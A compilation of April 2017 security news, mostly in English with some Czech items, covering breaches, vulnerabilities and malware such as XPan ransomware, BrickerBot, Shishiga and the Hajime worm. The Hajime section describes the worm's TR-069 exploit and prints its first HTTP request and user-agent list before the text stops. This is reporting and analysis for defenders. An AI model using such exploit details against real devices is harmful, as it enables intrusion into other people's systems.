Virtuální počítače mohly zaznamenat ztrátu konektivity v síti při nastavování adres IP.
Při používání RemoteRing Configuration Service Provider nedocházelo ke vzdálenému vyzvánění.
Mohlo dojít k úniku paměti v Internet Exploreru, pokud byla otevřena stránka s vloženými rámy, kde dochází k načítání obsahu z více různých domén.
Internet Explorer 11 neuložil javascriptové soubory při exportu do MHT.
Mohlo dojít k odhlášení ve webových aplikacích.
Integrovaná obrazovka zařízení měla jas nastaven na velmi nízkou úroveň. Dělo se to, pokud byla při startu počítače použita jen externí obrazovka a pak jste režim zobrazení přepnuli jen na integrovanou obrazovku.
Hraní aplikací či her pro prostředí Win32 a Direct3D v celoobrazovkovém režimu způsobovalo, že se systém nemusel probudit z režimu Connected Standby.
V edici Professional a vyšších nebylo možné pomocí Editoru místních zásad skupiny vypnout zamykací obrazovku.
Kvůli chybě v konfiguraci knihoven Windows Forms mohly antivirové programy přestat fungovat při spuštění počítače.
Bylo vyřešeno pár problémů s kompatibilitou v Internet Exploreru a Edgi.
Expert Discloses Several Flaws Found in Sugar CRM
26.4.2017 securityweek Vulnerebility
A researcher has discovered several vulnerabilities in SugarCRM’s popular customer relationship management (CRM) product. While most of the flaws appear to have been patched, the expert’s disclosure suggests that the vendor needs to make some improvements in how it communicates with individuals who report security holes.
Sugar is one of the most popular CRM solutions on the market. The product is used by many major organizations, including IBM, Audi, T-Mobile, HTC and Reebok.
Italy-based researcher Egidio Romano has been analyzing Sugar since 2011 and he claims to have identified more than 50 security issues. Many of the weaknesses were discovered during a virtual internship with the company that involved the analysis of SugarCRM Community Edition, which is open source.
While most of the vulnerabilities have been addressed, Romano disclosed over the weekend the details of several flaws that had apparently not been patched. After the researcher published his blog post, SugarCRM clarified that all the issues had in fact been fixed in the commercial version of its product.
The expert’s blog post describes CVE-2012-0694, a serialization-related code execution vulnerability he discovered back in 2012, and how last year he managed to find a way to bypass SugarCRM’s fix by leveraging a PHP flaw tracked as CVE-2016-7124.
During the summer of 2016, Romano also discovered several other vulnerabilities, including stored cross-site scripting (XSS), local file inclusion, SQL injection and authentication bypass vulnerabilities.
Some of the flaws could have been exploited by an unauthenticated attacker to gain access to user information, including names, email addresses, phone numbers, IP addresses, and credentials for services such as FTP, SSH, databases and VPNs.
Romano has also described a vulnerability involving SugarCRM’s updates.sugarcrm.com domain. According to the researcher, an attacker who manages to compromise this server may be able to hack all 2 million Sugar instances.
The expert said many of the flaws remain unpatched in the latest version of Sugar Community Edition.
In a security notice posted in response to Romano’s blog post, SugarCRM claimed all the vulnerabilities reported by the researcher last summer were patched in October with the release of Sugar 7.7.2.0.
SugarCRM has clarified that the company is focusing on its commercial products and the evolution of its open source program ended with the release of Sugar 7.
SugarCRM says it has been working on addressing the PHP-related serialization vulnerabilities and it plans on moving away from the use of this technique due to the risks it poses.
The firm said all of the flaws reported by Romano last summer had been classified as “medium” or “low” severity, and these types of weaknesses are no longer being patched in the Community Edition. Security holes that have a severity of “medium” or lower are not mentioned in release notes for the commercial product.
The vendor’s statement does not mention the communication issues it had in this case with the researcher. The company has however pointed out that it will make some changes to its policy concerning the inclusion of less severe vulnerabilities in its release notes.
HipChat Prompts Password Resets Following Server Hack
26.4.2017 securityweek Hacking
Group messaging platform HipChat this week prompted users to reset their passwords following a security incident involving one of its servers.
Atlassian-owned HipChat claims that a vulnerability in a popular third-party library used by HipChat.com was at fault, and that the incident affected only a server in the HipChat Cloud web tier. No other Atlassian systems or products appear to have been affected, the company says.
However, to ensure that users’ data remains secure, the company decided to invalidate passwords on all HipChat-connected user accounts. It also sent notifications to those users and provided them with details on how to reset their passwords.
The incident, HipChat Chief Security Officer Ganesh Krishnan reveals, resulted in attackers possibly accessing user account information such as name, email address and password (hashed using bcrypt with a random salt) for all instances (each of which is represented by a unique URL in the form company.hipchat.com). Room metadata such as room name and topic might have also been accessed.
In some cases, messages and content in rooms may have been accessed as well. The company says that, for more than 99.95% of instances, there was no evidence that messages or content in rooms have been accessed.
“Additionally, we have found no evidence of unauthorized access to financial and/or credit card information,” HipChat revealed.
HipChat Server uses the same third-party library, but it has been deployed in a manner that minimizes the risk of this type of attack, the company says, adding that an update will be shared to customers directly through the standard update channel.
“We are confident we have isolated the affected systems and closed any unauthorized access. To reiterate, we have found no evidence of other Atlassian systems or products being affected,” the company notes.
Atlassian continues to investigate the incident and says that it is actively working with law enforcement authorities on this matter.
Owned and operated by Atlassian Pty Ltd, HipChat is a chat platform that aims at providing business users with group chat, video chat, screen sharing and required security in a single app. It brings together services that teams might be using every day, features 256-bit SSL encryption, and also packs cloud integration and synchronization across devices.
In an emailed comment, Michael Patterson, CEO of Plixer International, pointed out to SecurityWeek that this incident once again proves that any tool a manufacturer uses can be abused for compromise.
“HipChat hashes passwords using bcrypt with a random salt, which adds a layer of security, and they reset the passwords associated with effected accounts. In this case the compromise came from a trusted 3rd party, which highlights that threat surfaces for any tool extend beyond the manufacturer themselves,” Patterson said.
He also noted that the compromise of ChatOps tools like HipChat can do a lot of harm within an organization: “ChatOps tools are used to support a DevOps and collaboration culture, meaning that teams of people as well as technology systems are dynamically connected and critical business processes can be automated. When a ChatOps tool becomes compromised, there is a high likelihood that the attacker can suddenly gain access across the most trusted and an important system a company has.”
Organizations Fail to Maintain Principle of Least Privilege
26.4.2017 securityweek Security
Security requires that confidential commercial data is protected; compliance requires the same for personal information. The difficulty for business is the sheer volume of data generated makes it difficult to know where all the data resides, and who has access to it. A new report shows that 47% of analyzed organizations in 2016 had at least 1,000 sensitive files open to every employee; and 22% had 12,000 or more.
These figures come from the Varonis 2016 Data Risk Assessments report. Each year Varonis conducts more than 1,000 risk assessments for both existing and potential customers. For its latest analysis of data risk, it has selected, at random, 80 of these assessments. They cover 33 industries in 12 different countries. Forty-two of the organizations have fewer than 1000 employees, and 38 have 1001 or more employees.
One of the problems highlighted by Varonis is that organizations fail to maintain the principle of least privilege in their access control. It found a total of 48 million folders, or an average of 20% of all folders, accessible to global groups. "Many data breaches are opportunistic or rudimentary in nature, and many originate from an insider, or an insider whose credentials or system has been hijacked," warns Varonis. "Excessive user access through global groups is a key failure point for many security and compliance audits."
That's not to say that all organizations fail. At one end of the scale, a government entity had only 29 of 290,000 folders open to everyone (with none containing sensitive files); while at the other end, an insurance firm had 35% of 86.4 million folders open to all employees.
Focusing more specifically on 'sensitive' files (potentially containing PII, PHI, card details, SSNs and intellectual property), Varonis found a similar range of access. One company in the construction trade had only 0.01% of almost 1000 sensitive files open to the everyone group. Conversely, a banking institution had 80% of more than 245,000 sensitive files accessible to every employee.
Apart from audit and compliance issues, Varonis points to the Panama Papers as an illustration of the dangers. In April 2016, 11.5 million confidential files belonging to the Panama law firm Mossack Fonseca were leaked to a German newspaper, revealing how its clients hid billions of dollars in tax havens.
Stale data is another risk highlighted in the report. Varonis defines stale data as any data that hasn't been touched in six months or more. "Stale data represents little value to the business while it's not being used, but still carries with it risk and potential financial liability if used inappropriately." It also adds a management and cost burden, especially if it is maintained on high-performance storage.
The amount of stale data found by Varonis ranged from just 0.03% (still 21 gigabytes of data) in an investment management firm, to 527 terabytes in more than 35,000 folders at an environment firm.
Varonis also found numerous problems with both permissions and passwords. Issues with permissions include protected folders found in deeper levels of the file system, which "may contain users and permissions which are not visible at the higher levels, leading an administrator to mistakenly assume that permissions to a folder are configured correctly."
Unresolved security identifiers are also a problem. These occur when a user on an ACL is deleted from Active Directory. "They can potentially give unauthorized users (like hackers) access to data," warns Varonis.
One of the problems with passwords is the tendency to allow non-expiring passwords, which, warns Varonis, "allow unlimited time to brute force crack them and indefinite access to data via the account." An insurance firm had 58% of its 246,865 using non-expiring passwords. But an education organization had 100% of 257,000 using such passwords -- and 90% of these were stale enabled users.
Varonis believes that organizations spend too much time and money in defending specific threats to keep attackers off the network; rather than protecting the data itself from both opportunistic insiders and hackers that breach the 'perimeter'. In January of this year, a separate report (PDF) from Forrester (commissioned by Varonis) concluded that "an overwhelming majority of companies face technical and organizational challenges with data security, are focused on threats rather than their data, and do not have a good handle on understanding and controlling sensitive data."
"Many point products are designed to mitigate specific threats," said David Gibson, VP of strategy and market development with Varonis. "If they're used tactically, instead of supporting a strategy that improves the overall security of data, they can not only cost a lot of money, but also provide a false sense of security. Ransomware, for example, exploits the same internal deficiencies that a rogue or compromised insider might -- insufficient detective capabilities and over-subscribed access. Too many organizations look for tools that specifically address ransomware, but neglect to buttress core defenses that would mitigate more than just this specific threat."
XPan, I am your father
26.4.2017 Kaspersky Ransomware
.one ransomware decrypted
While we have previously written on the now infamous XPan ransomware family, some of it’s variants are still affecting users primarily located in Brazil. Harvesting victims via weakly protected RDP (remote desktop protocol) connections, criminals are manually installing the ransomware and encrypting any files which can be found on the system.
Interestingly, this XPan variant is not necessarily new in the malware ecosystem. However, someone has chosen to keep on infecting victims with it, encouraging security researchers to hunt for samples related to the increasing number of incident reports. This sample is what could be considered as the “father” of other XPan ransomware variants. A considerable amount of indicators within the source code depict the early origins of this sample.
“Recupere seus arquivos aqui.txt” loosely translated to “recover your files here” is a phrase that not many Brazilian users are eager to see in their desktops.
The ransomware author left a message for Kaspersky in other versions and has done the same in this one, with traces to the NMoreira “CrypterApp.cpp” there’s a clear link between different variants among this malware family.
NMoreira, XPan, TeamXRat, different names but same author.
Even though many Brazilian-Portuguese strings are present upon initial analysis, there were a couple that caught our attention. Firstly, the ransomware uses a batch file which will pass a command line parameter to an invoked executable file, this parameter is “eusoudejesus” which means “I’m from Jesus”. Developers tend to leave tiny breadcrumbs of their personality behind in each one of their creations, and in this sample we found many of them.
A brief religious reference found in this XPan variant.
Secondly, a reference to a Brazilian celebrity is done, albeit indirectly. “Computador da Xuxa” was a toy computer sold in Brazil during the nineties, however it’s also a popular expression which is used to make fun of very old computers with limited power.
This is what cybercriminals think of your encrypted computer: just a toy they can control.
“Muito bichado” equals to finding a lot of problems in these type of systems, in this case meaning that the environment in which is XPan is executing is not playing fair and the execution is quite buggy.
Lastly, we have the ransomware note demanding the victim to send an email to the account ‘one@proxy.tg’. Considering that the extension for all the encrypted files in this variant is ‘.one’ this seems like a pretty straightforward naming convention for the criminals’ campaigns.
The rescue note in Portuguese.
Upon closer inspection, we discovered that this sample is nearly identical to another version of Xpan which used to be distributed back in November 2016 and used the extension “.__AiraCropEncrypted!”. Every bit of executable code remains the same, which is quite surprising, because since that time there were several newer versions of this malware with an updated encryption algorithm. Both samples have the same PE timestamp dating back to the 31st of October 2016.
The only difference between the two is the configuration block which contains the following information:
list of target file extensions;
ransom notes;
commands to execute before and after encryption;
the public RSA key of the criminals.
The decrypted configuration block of Xpan that uses the extension “.one”.
The file encryption algorithm also remains the same. For each target file the malware generates a new unique 255-byte random string S (which contains the substring “NMoreira”), turns it into a 256-bit key using the API CryptDeriveKey, and proceeds to encrypt the file contain using AES-256 in CBC mode with zero IV. The string S will be encrypted using the criminals’ RSA public key from the configuration block and stored in the beginning of the encrypted file.
According to one of the victims that contacted us, criminals were asking for 0.3 bitcoin to provide the recovery key, using the same approach as they did with before: the user sends a message to a mailbox with his unique ID and patiently awaits for further instructions.
The victims so far are small and medium businesses in Brazil: ranging from a dentist clinic to a driving school, demonstrating once again that ransomware makes no distinctions and everyone is at risk. As long as there are victims, assisting them and providing decryption tools whenever possible is necessary, no matter the ransomware family or when it was created.
Victims: we can help
This time luck is on the victims’ side! Upon thorough investigation and reverse engineering of the sample of “.one” version of Xpan, we discovered that the criminals used a vulnerable cryptographic algorithm implementation. It allowed us to break encryption as with the previously described Xpan version.
We successfully helped a driving school and a dentist clinic to recover their files for free and as usual we encourage victims of this ransomware to not pay the ransom and to contact our technical support for assistance in decryption.
Brazilian cybercriminals are focusing their efforts in creating new and local ransomware families, attacking small companies and unprotected users. We believe this is the next step in the ransomware fight: going from global scale attacks to a more localized scenario, where local cybercriminals will create new families from scratch, in their own language, and resorting to RaaS (Ransomware-as-a-service) as a way to monetize their attacks.
MD5 reference
dd7033bc36615c0fe0be7413457dccbf – Trojan-Ransom.Win32.Xpan.e (encrypted file extension: “.one”)
54217c1ea3e1d4d3dc024fc740a47757 – Trojan-Ransom.Win32.Xpan.d (encrypted file extension: “.__AiraCropEncrypted!”)
Cybercrime – Interpol shutdown nearly 9,000 C&C servers in Asia hacked with a WordPress plug exploit
26.4.2017 securityaffairs CyberCrime
The Interpol located and shut down nearly 9,000 Command and control servers located in Asia and hacked with a WordPress plug-in exploit.
An investigation conducted by the Interpol resulted in the identification of nearly 9,000 command and control servers located in Asia.
The law enforcement body operated with the support of private partners, including Kaspersky Lab, Cyber Defense Institute, Booz Allen Hamilton, British Telecom, Fortinet and Palo Alto Networks, and the China.
According to the Interpol, the investigators also spotted a number of servers operated by local governments that have been compromised and used as command and control systems for botnets.
Law enforcement shut down 9,000 C&C servers across “hundreds” of compromised Websites in Indonesia, Malaysia, Myanmar, Philippines, Singapore, Thailand, and Vietnam.
“An INTERPOL-led operation targeting cybercrime across the ASEAN region has resulted in the identification of nearly 9,000 Command and Control (C2) servers and hundreds of compromised websites, including government portals.” reads the announcement published by the Interpol.
“Information provided by the private sector combined with cyber issues flagged by the participating countries enabled specialists from INTERPOL’s Cyber Fusion Centre to produce 23 Cyber Activity Reports. The reports highlighted the various threats and types of criminal activity which had been identified and outlined the recommended action to be taken by the national authorities.”
The experts involved in the investigation have discovered servers used in ransomware-based campaigns, DDoS attacks, and spam distribution.
It is interesting to note that most of the compromised servers have been hacked using an unnamed WordPress plugin exploit.
“Analysis identified nearly 270 websites infected with a malware code which exploited a vulnerability in the website design application. Among them were several government websites which may have contained personal data of their citizens.” continues the Interpol, who also confirmed to have identified a number of phishing website operators.
“A number of phishing website operators were also identified, including one with links to Nigeria, with further investigations into other suspects still ongoing. One criminal based in Indonesia selling phishing kits via the Darknet had posted YouTube videos showing customers how to use the illicit software.”
“With direct access to the information, expertise and capabilities of the private sector and specialists from the Cyber Fusion Centre, participants were able to fully appreciate the scale and scope of cybercrime actors across the region and in their countries,” said IGCI Executive Director Noboru Nakatani.
“Sharing intelligence was the basis of the success of this operation, and such cooperation is vital for long-term effectiveness in managing cooperation networks for both future operations and day to day activity in combating cybercrime,”.
The operation is the demonstration of the crucial support of private sector in the fight against the cybercrime.
R2Games company breached for the second time in two years, over one million accounts compromised
26.4.2017 securityaffairs CyberCrime
R2Games compromised for the second time in a few years, more than one million accounts of U.S., France, German, and Russian forums compromised.
Once again, the hackers target a gaming firm, the online gaming company Reality Squared Games (R2Games) has been breached for the second time in just two years. The news was reported by the data breach notification service LeakBase who reported that a hacker confirmed that the security breached happened earlier this month.The company developed many games on both iOS and Android operating systems, it currently has 19 online games in its portfolio and claims over 52 million players.R2GAMES data breach
The first incident occurred in December 2015 and went on until July 2016, more than 22 million R2Games accounts were compromised. Hacker accessed usernames, hashed passwords, IP addresses, and email addresses.
This time, the hacker claimed all forums managed by R2Games have been hacked, such as the Russian version of r2games.com.
Data belongs to forums operated by in company in various countries, including U.S., France, German, and Russia. Experts noticed that all the hacked platforms running of the vBulletin CMS whom older version are affected by well-known flaws.
Data compromised in the last breach includes user credentials, email addresses, IP addresses, and other optional attributes, such as instant messenger IDs, birthday, and Facebook related details (ID, name, access token).
Hunt identified 1,023,466 unique email addresses, 482,074 were also included in data dumps from other breaches.
The dump includes 5,191,898 unique email addresses, 3,379,071 of them related to mail.ar.r2games.com or mail.r2games.com, remaining 789,361 addresses looked like automatically generated (number]@vk.com addresses).
“When asked about the passwords, Hunt told Salted Hash many of them are MD5 with no salt, but a large number of them have a hash corresponding to the password “admin” and a few hundred thousand others are using the plain text word “sync”.” reported Salted Hash.
“The observation I’d make here is that clearly, they don’t seem to be learning from previous failures. The prior incident should really have been a wake-up call and to see a subsequent breach not that long after is worrying. Perhaps the prior denials are evidence that they just don’t see the seriousness in security,” Hunt told Salted Hash.
The gaming did not respond to requests for comment, R2Games player are invited to change passwords on R2Games forums and for any other service that shares the same login credentials.
Chipotle Investigating Payment Card Breach
26.4.2017 securityweek Incindent
Fast-casual restaurant chain Chipotle Mexican Grill, which has more than 2,000 locations in the United States and other countries, informed customers on Tuesday that its payment processing systems have been breached.
Chipotle said it recently detected unauthorized activity on the network that supports payment processing for its restaurants. The company’s investigation into the incident is ongoing and only limited information has been made public for now.
An initial investigation showed that attackers may have accessed data from cards used at restaurants between March 24 and April 18, 2017, but it’s unclear how many locations are affected.
Chipotle has notified law enforcement and it’s working with cybersecurity firms and its payment processor to investigate the incident. The company believes the breach has been contained, and pointed out that it has implemented some security enhancements.
“Consistent with good practices, consumers should closely monitor their payment card statements,” the company stated. “If anyone sees an unauthorized charge, they should immediately notify the bank that issued the card. Payment card network rules generally state that cardholders are not responsible for such charges.”
Chipotle’s disclosure of the data breach coincided with the company’s financial report for the first quarter of 2017. The restaurant said its revenue increased by 28.1% to $1.07 billion compared to the first quarter of 2016.
Several other major restaurant chains reported suffering data breaches in the past months, including Shoney’s, CiCi’s, Arby’s, Wendy’s and Noodles & Company.
Flaws in Hyundai App Allowed Hackers to Steal Cars
26.4.2017 securityweek Vulnerebility
South Korean carmaker Hyundai has released updates for its Blue Link mobile applications to address vulnerabilities that could have been exploited by hackers to locate, unlock and start vehicles.
The Blue Link application, available for both iOS and Android devices, allows users to remotely access and monitor their car. The list of features provided by the app includes remote engine start, cabin temperature control, stolen vehicle recovery, remote locking and unlocking, vehicle health reports, and automatic collision notifications.
Researchers at security firm Rapid7 discovered that the app had two potentially serious flaws related to a log transmission feature introduced in December
Versions 3.9.4 and 3.9.5 of the Blue Link apps upload an encrypted log file to a pre-defined IP address over HTTP. The name of the file includes the user’s email address and the file itself contains various pieces of information, such as username, password, PIN, and historical GPS data.
While the log file is encrypted, the encryption relies on a hardcoded key that cannot be modified. A man-in-the-middle (MitM) attacker — e.g. via a compromised or rogue Wi-Fi network — can intercept HTTP traffic associated with the Blue Link application and access the log file and the data it contains.
The information in this log file can be used by the attacker to locate, unlock and start the targeted vehicle.
Rapid7 has published a blog post detailing the vulnerabilities. ICS-CERT has also released an advisory which rates the MitM issue (CVE-2017-6052) as a medium severity flaw and the hardcoded cryptographic key weakness (CVE-2017-6054) as high severity.
The flaws were discovered by Rapid7 in February and Hyundai patched them in March with the release of Blue Link 3.9.6 for both iOS and Android. The new version removes the log transmission feature and disables the TCP service located at the IP address where the log files were sent. Hyundai has made the app update mandatory for users.
Hyundai said there was no evidence that the vulnerabilities had been exploited for malicious purposes.
While the flaws could have had a serious impact, Rapid7 and Hyundai pointed out that it would have been “difficult to impossible to conduct this attack at scale,” due to the fact that the attacker needed privileged network access in order to exploit the security holes.
The fact that a mobile application provided by a car manufacturer is vulnerable to hacker attacks is not surprising. In the past months, researchers reported finding flaws in many car apps, including from Tesla.
Hackeři napadli desítky tisíc počítačů. Zneužili nástroje špiónů
25.4.2017 Novinky/Bezpečnost Hacking
Není žádným tajemstvím, že tajné služby disponují sofistikovanými nástroji pro špionáž různých počítačových systémů. A výjimkou není ani americká Národní agentura pro bezpečnost (NSA). Právě špiónského nářadí této agentury se však zmocnili počítačoví piráti. A začali je okamžitě zneužívat.
V arzenálu NSA – a nutno podotknout i dalších tajných služeb – se v internetové éře běžně objevují tzv. exploity, tedy speciální programy umožňující získat přístup na nejrůznější weby, služby, ale také pro nejrůznější dokumenty.
A právě podobných nástrojů, které z NSA unikly před týdnem, se zmocnili počítačoví piráti. Podle serveru The Hacker News je již několik hackerských organizací zneužívá k útokům.
V praxi mohou díky zmiňovaným exploitům útoky kyberzločinci vypadat následovně. Prostřednictvím jednoho škodlivého kódu by se útočníci dostali do administračního rozhraní nějakého sportovního areálu, který nabízí stažení rozpisu tréninků v textovém dokumentu formátu Word. Ten by pomocí dalšího exploitu infikovali tak, že by mohli sledovat v podstatě každého uživatele, který by tento soubor stáhnul z daného webu.
O tom, že je počítač infikován, by samozřejmě uživatel neměl ani ponětí. Dokument by se mu normálně otevřel, avšak spolu s ním by zároveň na pevný disk stáhnul i nezvaného návštěvníka – právě prostřednictvím něho by pak útočník získal přístup ke všem datům.
Přes 100 000 napadených počítačů
Podobným způsobem se podařilo za pouhý týden proniknout hackerům do několika tisíc počítačových systémů, jak upozornili bezpečnostní výzkumníci švýcarské bezpečnostní společnosti Binary Edge.
Těm se podařilo objevit již přes 100 000 počítačů, které byly napadeny různými hackerskými organizacemi pomocí nástrojů od NSA. Zda se útoky uskutečnily i v Česku, zatím není jasné.
Zpravidla jde o stroje běžící na operačním systému Windows. Jde však o starší systémy od Microsoftu, desítek se údajně hrozba netýká, upozornil server The Hacker News.
Převezmou kontrolu
Útoky se údajně týkaly systémů Windows XP, Windows Server 2003, Windows 7 a Windows 8. Je nicméně nutné zdůraznit, že majitelé sedmiček a osmiček by měli být proti útokům chráněni, pokud mají stažené všechny nejnovější aktualizace. Například pro Windows XP však již bezpečnostní updaty nevycházejí, uživatelé tak nemohou být chráněni.
Nad napadeným strojem mohou počítačoví piráti převzít zcela kontrolu. Stejně tak mohou přistupovat k datům uloženým na pevném disku, případně celý stroj zotročit a využívat k dalším útokům.
Display Software Flaw Affects Millions of Devices
25.4.2017 securityweek Vulnerebility
A potentially serious vulnerability has been found in third-party software shipped by several major vendors for their displays. The developer has rushed to release a patch for the flaw, which is believed to affect millions of devices worldwide.
The security hole was identified by researchers at SEC Consult in display software developed by Portrait Displays. The impacted product allows users to configure their displays (e.g. rotation, alignment, colors and brightness) via a software application instead of hardware buttons.
Portrait Displays’ products are used by several major vendors, including Sony, HP, Acer, Fujitsu, Philips, Dell, Benq, Lenovo, Sharp and Toshiba. However, SEC Consult could only confirm the vulnerability for Fujitsu’s DisplayView, HP’s Display Assistant and My Display, and Philips’ SmartControl applications. The apps, which are pre-installed on millions of devices, have been classified by the security firm as bloatware.
According to researchers, the vulnerability, tracked as CVE-2017-3210, exists in the Portrait Displays SDK service and it allows any authenticated attacker to execute arbitrary commands and escalate their privileges to SYSTEM.
SEC Consult said a hacker can exploit the flaw -- by changing the service’s binary path -- for various tasks, including to create new users, add users to groups, or change privileges.
Portrait Displays, which has classified the vulnerability as critical, has released a patch and advised users to install it immediately. The company says it’s not aware of any attacks where this flaw may have been exploited, but a “comprehensive review” is being conducted to confirm this.
As an alternative, users can address the problem by removing the vulnerable service’s permissions via the “sc” command in Windows. CERT/CC has also released an advisory for this security hole.
While a patch has been made available, SEC Consult told SecurityWeek that it’s unlikely regular users will install it any time soon, especially since many will not even know they are affected. On the other hand, experts believe affected vendors could push the patch to users via their automatic software installers (e.g. Fujitsu DeskUpdate).
“It is quite juicy to observe that companies selling millions of notebooks, PCs and convertibles simply do not care (enough) about security,” SEC Consult’s Werner Schober said in a blog post. “The affected companies do have a net worth of multiple billions, but they do not have a few thousand euros/dollars/yen to conduct a proper security review on the software and services they are acquiring from 3rd parties. This vulnerability would have been identified immediately in a thorough security review of the application/service if an audit would have been conducted by security experts before shipping devices with this software. Even automated vulnerability scans would detect such weak service permissions.”
New BrickerBot Variants Emerge
25.4.2017 securityweek BotNet
New variants of a recently discovered BrickerBot Internet of Things (IoT) malware capable of permanently disabling devices were observed last week, Radware security researchers warn.
BrickerBot first emerged about a month ago, with two variants observed in early April. The first threat had a short life span of less than a week and targeted BusyBox-based Linux devices. The other is still activ and targeting devices both with and without BusyBox. Devices with an exposed Telnet service that is secured with default credentials are potential victims.
The malware was designed to disable certain functionality on the targeted devices, corrupt storage, and wipe files. Because the compromised devices are rendered useless, the researchers called this type of attack Permanent Denial-of-Service (PDoS).
Given the potential damaging power of BrickerBot, the Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) issued an alert to warn users and organizations alike of the risks they are exposed to when using IoT devices that aren’t properly secured.
Now, Radware says that two new BrickerBot variants are making the rounds, also focused on disabling IoT devices. They appear to have new command sequences, although similar to the previous variants, and have already launched thousands of attacks.
Targeting six device types that BrickerBot.1 was hitting but also capable of compromising several other device types, BrickerBot.3 attempts to disrupt connectivity by removing the default route and disabling TCP timestamps, while also wiping the root and limiting the number of kernel threats to 1. It focuses on the devices prone to Mirai attacks.
Radware detected 1118 PDoS attempts within the first 12 hours of activity on April 12, with all attacks launched from a limited number of clearnet IP addresses (the devices appear to be running an outdated version of the Dropbear SSH server). The number of bots performing these attacks grew to 15 within the first 12 hours.
“The devices used to perform the PDoS attacks on Radware’s honeypot do not correspond to the devices from BrickerBot.1. Although BrickerBot.1 was also abusing a limited number of clearnet connected devices to perform its attack, there is no immediate correlation between both,” Radware says. However, they were using a different honeypot when detecting the new variant.
Dubbed BrickerBot.4, the other new variant was hitting from a single device located on the Clearnet and running an outdated version of the Dropbear SSH server. This isolated bot performed 90 attacks and was active only for several hours.
“It is not possible to assess how widely spread the attacks are, but the potential damage BrickerBot.3 poses a clear and present danger for any IoT device with factory default credentials,” the security researchers warn.
According to a recent article on BleepingComputer, however, BrickerBot might have damaged over 2 million devices. His author, who goes by the online handle of Janit0r, claims to have created the malware to raise awareness of the risks insecure IoT devices pose. He sees the bot as a cure for the threat posed by IoT botnets, after they have been associated with a large number of distributed denial of service attacks in the second half of last year.
Linux Shishiga malware, a threat in dangerous evolution
25.4.2017 securityaffairs Virus
Malware researchers from security firm ESET have discovered a new Linux threat dubbed Shishiga malware targeting systems in the wild.
Malware researchers from ESET have discovered a new Linux malware dubbed Linux/Shishiga targeting systems in the wild.
The Linux/Shishiga malware uses four different protocols (SSH, Telnet, HTTP and BitTorrent) implements a modular architecture by using Lua scripts.
“Among all the Linux samples that we receive every day, we noticed one sample detected only by Dr.Web – their detection name was Linux.LuaBot. We deemed this to be suspicious as our detection rates for the Luabot family have generally been high. Upon analysis, it turned out that this was, indeed, a bot written in Lua, but it represents a new family, and is not related to previously seen Luabot malware. Thus, we’ve given it a new name: Linux/Shishiga. It uses 4 different protocols (SSH – Telnet – HTTP – BitTorrent) and Lua scripts for modularity.” reads the analysis published by security firm ESET.
The spreading mechanism behind the Shishiga malware leverage on brute-force attack, the malicious code in fact
Shishiga malware relies on the use of weak, default credentials in its attempts to plant itself on insecure systems through brute-force attacks. The malware uses a built-in password list in the attempt to hack a system.
Despite Shishiga has many similarities with other recent malware in abusing weak Telnet and SSH credentials, researchers consider it more sophisticated due to the usage of the BitTorrent protocol and Lua modules.
“At a first glance, Linux/Shishiga might appear to be like the others, spreading through weak Telnet and SSH credentials, but the usage of the BitTorrent protocol and Lua modules separates it from the herd. BitTorrent used in a Mirai-inspired worm, Hajime, was observed last year and we can only speculate that it might become more popular in the future.” states ESET.
According to the experts, the Shishiga malware is a working progress, at the time of the ESET’s investigation it infected just a small number of Linux machines, the researchers also observed continuous addition, removal, and modification of the components along with code comments and debug information.
It’s possible that Shishiga could still evolve and become more widespread but the low number of victims, constant adding, removing, and modifying of the components, code comments and even debug information, clearly indicate that it’s a work in progress. To prevent your devices from being infected by Shishiga and similar worms, you should not use default Telnet and SSH credentials.
ESET is warning of a possible evolution of the Shishiga malware, in order “to prevent your devices from being infected by Shishiga and similar worms, you should not use default Telnet and SSH credentials.”
Check Point jednotně ochrání síť, mobily i cloud
25.4.2017 SecurityWorld Zabezpečení
Infinity, novou architekturu pro řízení bezpečnosti, představil Check Point. Nabízí jednotnou ochranu před hrozbami pro síťovou infrastrukturu, mobilní zařízení i cloud.
Novinka představuje kombinaci tří klíčových vlastností: jednotné bezpečnostní platformy,prevence hrozeb a konsolidovaného systému.
Podle výrobce umožňuje blokovat prý i ty nejsofistikovanější známé i neznámé hrozby, ještě než mohou způsobit jakékoli škody, a nabízí jednotnou administraci, modulární správu politik a integrovanou viditelnost hrozeb.
Výrobce zároveň představil i nové ultra-high-end bezpečnostní brány 44000 a 64000 s doposud vůbec nejrychlejší platformou prevence hrozeb s propustností prevence hrozeb v reálném prostředí 42 Gb/s a propustností firewallu v reálném prostředí 636 Gb/s.
Hajime, the mysterious evolving botnet
25.4.2017 Kaspersky BotNet
Hajime (meaning ‘beginning’ in Japanese) is an IoT worm that was first mentioned on 16 October 2016 in a public report by RapidityNetworks. One month later we saw the first samples being uploaded from Spain to VT. This worm builds a huge P2P botnet (almost 300,000 devices at the time of publishing this blogpost), but its real purpose remains unknown.
Hajime is continuously evolving, adding and removing features over time. The malware authors are mainly reliant on very low levels of security.
In this blogpost we outline some of the recent ‘improvements’ to Hajime, some techniques that haven’t been made public, and some statistics about infected IoT devices.
ATK module improvements
First of all, let’s take a look at the changes made to the attack module recently. Currently, the ATK (attack) module supports three different attack methods which help to propagate the worm on different IoT devices:
TR-069 exploitation;
Telnet default password attack;
Arris cable modem password of the day attack.
Of these three attacks, the TR-069 exploit is a new one, implemented recently by the attackers.
Technical Report 069 is a standard published by the Broadband Forum, which is an industry organization defining standards used to manage broadband networks. Many ISPs and device manufacturers are members of the Broadband Forum. TR-069 allows ISPs to manage modems remotely. TCP port 7547 has been assigned to this protocol, but some devices appear to use port 5555 instead.
The TR-069 NewNTPServer feature can be used to execute arbitrary commands on vulnerable devices. In order to do so, the exploit starts by connecting to port 7547 and then sends the following HTTP request:
GET / HTTP/1.1
Host: VICTIM_HOST:VICTIM_PORT
User-Agent: RANDOM_USER_AGENT
Content-Type: text/xml
Content-Length: 0
Where RANDOM_USER_AGENT is chosen from the following list:
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
